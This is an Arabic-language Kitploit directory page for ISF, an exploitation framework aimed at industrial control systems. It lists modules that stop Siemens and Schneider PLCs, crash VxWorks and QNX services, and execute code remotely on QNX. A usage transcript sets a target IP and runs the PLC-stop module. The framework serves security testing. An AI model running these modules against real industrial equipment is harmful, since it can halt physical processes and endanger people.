Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
isf — ISF (إطار استغلال أنظمة التحكم الصناعي)، إطار استغلال قائم على Python | Kitploit
أدوات/GitHubGitHub/dark-lbp/isf
أطر اختبار الاختراقأطر الاستغلالتخطيط الشبكةتحليل الثغرات الأمنيةالاستغلالأمن SCADA/ICSجمع المعلوماتالاختبار العشوائيتطوير الحمولاتArchived
GitHubdark-lbp/isf

isf

ISF (إطار استغلال أنظمة التحكم الصناعي)، إطار استغلال قائم على Python

1.1k30113منذ 2 سنواتلم تتم المراجعة بعد
عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إطار الاستغلال الصناعي

ISF (إطار الاستغلال الصناعي) هو إطار استغلال مبني على بايثون، مشابه لإطار metasploit.

ISF مبني على المشروع مفتوح المصدر routersploit.

اقرأ هذا بلغات أخرى: English, 简体中文,

إخلاء مسؤولية

استخدام ISF لمهاجمة أهداف دون موافقة مسبقة متبادلة هو عمل غير قانوني. يتحمل المستخدم النهائي مسؤولية الامتثال لجميع القوانين المحلية والولائية والفيدرالية المعمول بها. لا يتحمل المطورون أي مسؤولية ولا يتحملون أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.

عملاء بروتوكول ICS

الاسمالمسارالوصف
modbus_tcp_clienticssploit/clients/modbus_tcp_client.pyعميل Modbus-TCP
wdb2_clienticssploit/clients/wdb2_client.pyعميل WdbRPC الإصدار 2 (Vxworks 6.x)
s7_clienticssploit/clients/s7_client.pyعميل s7comm (PLC S7 300/400)

وحدة الاستغلال

الاسمالمسارالوصف
s7_300_400_plc_controlexploits/plcs/siemens/s7_300_400_plc_control.pyتشغيل/إيقاف PLC S7-300/400
s7_1200_plc_controlexploits/plcs/siemens/s7_1200_plc_control.pyتشغيل/إيقاف/إعادة تعيين PLC S7-1200
vxworks_rpc_dosexploits/plcs/vxworks/vxworks_rpc_dos.pyهجوم حجب الخدمة عن بعد لـ Vxworks RPC (CVE-2015-7599)
quantum_140_plc_controlexploits/plcs/schneider/quantum_140_plc_control.pyتشغيل/إيقاف PLC سلسلة Schneider Quantum 140
crash_qnx_inetd_tcp_serviceexploits/plcs/qnx/crash_qnx_inetd_tcp_service.pyهجوم حجب الخدمة لخدمة TCP Inetd في QNX
qconn_remote_execexploits/plcs/qnx/qconn_remote_exec.pyتنفيذ كود عن بعد لـ qconn في QNX
profinet_set_ipexploits/plcs/siemens/profinet_set_ip.pyتكوين IP لجهاز Profinet DCP

وحدة المسح

الاسمالمسارالوصف
profinet_dcp_scanscanners/profinet_dcp_scan.pyماسح Profinet DCP
vxworks_6_scanscanners/vxworks_6_scan.pyماسح Vxworks 6.x
s7comm_scanscanners/s7comm_scan.pyماسح S7comm
enip_scanscanners/enip_scan.pyماسح EthernetIP

وحدة بروتوكولات ICS (وحدة Scapy)

يمكن استخدام هذه البروتوكولات في أطر عمل اختبار الاختراق الأخرى مثل Kitty أو لإنشاء عميل خاص بك.

الاسمالمسارالوصف
pn_dcpicssploit/protocols/pn_dcpبروتوكول Profinet DCP
modbus_tcpicssploit/protocols/modbus_tcpبروتوكول Modbus TCP
wdbrpc2icssploit/protocols/wdbrpc2بروتوكول WDB RPC الإصدار 2
s7commicssploit/protocols/s7comm.pyبروتوكول S7comm

التثبيت

متطلبات بايثون

  • gnureadline (فقط على OSX)
  • requests
  • paramiko
  • beautifulsoup4
  • pysnmp
  • python-nmap
  • scapy نقترح تثبيت scapy يدوياً وفقاً لهذا المستند الرسمي

التثبيت على Kali

root@kitploit:~
git clone https://github.com/dark-lbp/isf/
cd isf
python isf.py

الاستخدام

root@kitploit:~
    root@kali:~/Desktop/temp/isf# python isf.py
    
      _____ _____  _____ _____ _____  _      ____ _____ _______
     |_   _/ ____|/ ____/ ____|  __ \| |    / __ \_   _|__   __|
       | || |    | (___| (___ | |__) | |   | |  | || |    | |
       | || |     \___ \\___ \|  ___/| |   | |  | || |    | |
      _| || |____ ____) |___) | |    | |___| |__| || |_   | |
     |_____\_____|_____/_____/|_|    |______\____/_____|  |_|
    
    
                    إطار الاستغلال ICS
    
    ملاحظة : ICSSPOLIT هو فرع من routersploit في
               https://github.com/reverse-shell/routersploit
    فريق التطوير : wenzhe zhu(dark-lbp)
    الإصدار  : 0.1.0
    
    الاستغلالات: 2 الماسحات: 0 بيانات الاعتماد: 13
    
    استغلالات ICS:
        PLC: 2          مفتاح ICS: 0
        البرمجيات: 0
    
    isf >

الاستغلالات

root@kitploit:~
isf > use exploits/plcs/
exploits/plcs/siemens/  exploits/plcs/vxworks/
isf > use exploits/plcs/siemens/s7_300_400_plc_control
exploits/plcs/siemens/s7_300_400_plc_control
isf > use exploits/plcs/siemens/s7_300_400_plc_control
isf (التحكم في PLC S7-300/400) >

يمكنك استخدام مفتاح التبويب للإكمال التلقائي.

الخيارات

عرض خيارات الوحدة:

root@kitploit:~
isf (التحكم في PLC S7-300/400) > show options

خيارات الهدف:

   الاسم       الإعدادات الحالية     الوصف
   ----       ----------------     -----------
   target                          عنوان الهدف مثلاً 192.168.1.1
   port       102                  منفذ الهدف


خيارات الوحدة:

   الاسم        الإعدادات الحالية     الوصف
   ----        ----------------     -----------
   slot        2                    رقم الفتحة (slot) لوحدة المعالجة المركزية.
   command     1                    الأمر 0: تشغيل PLC، 1: إيقاف PLC.


isf (التحكم في PLC S7-300/400) >

تعيين الخيارات

root@kitploit:~
isf (التحكم في PLC S7-300/400) > set target 192.168.70.210
[+] {'target': '192.168.70.210'}

تشغيل الوحدة

root@kitploit:~
isf (التحكم في PLC S7-300/400) > run
[*] جاري تشغيل الوحدة...
[+] الهدف قيد التشغيل
[*] إرسال حزمة إلى الهدف
[*] إيقاف PLC
isf (التحكم في PLC S7-300/400) >

عرض معلومات عن الاستغلال

root@kitploit:~
isf (التحكم في PLC S7-300/400) > show info

الاسم:
التحكم في PLC S7-300/400

الوصف:
استخدام أمر S7comm لتشغيل/إيقاف PLC.

الأجهزة:
-  وحدات التحكم المنطقية القابلة للبرمجة (PLCs) من سيمنز S7-300 و S7-400

المؤلفون:
-  wenzhe zhu <jtrkid[at]gmail.com>

المراجع:

isf (التحكم في PLC S7-300/400) >

المستندات

  • استخدام عميل Modbus-TCP
  • استخدام عميل WDBRPCV2
  • استخدام عميل S7comm
  • استخدام SNMP_bruteforce
  • استخدام اختراق كلمة مرور PLC S7 300/400
  • استخدام ماسح Vxworks 6.x
  • استخدام ماسح Profient DCP
  • استخدام ماسح PLC S7comm
  • استخدام وحدة تعيين IP لـ Profinet DCP
  • تحميل الوحدات من مجلد إضافي
  • كيفية كتابة وحدة خاصة بك
تنزيل الأداة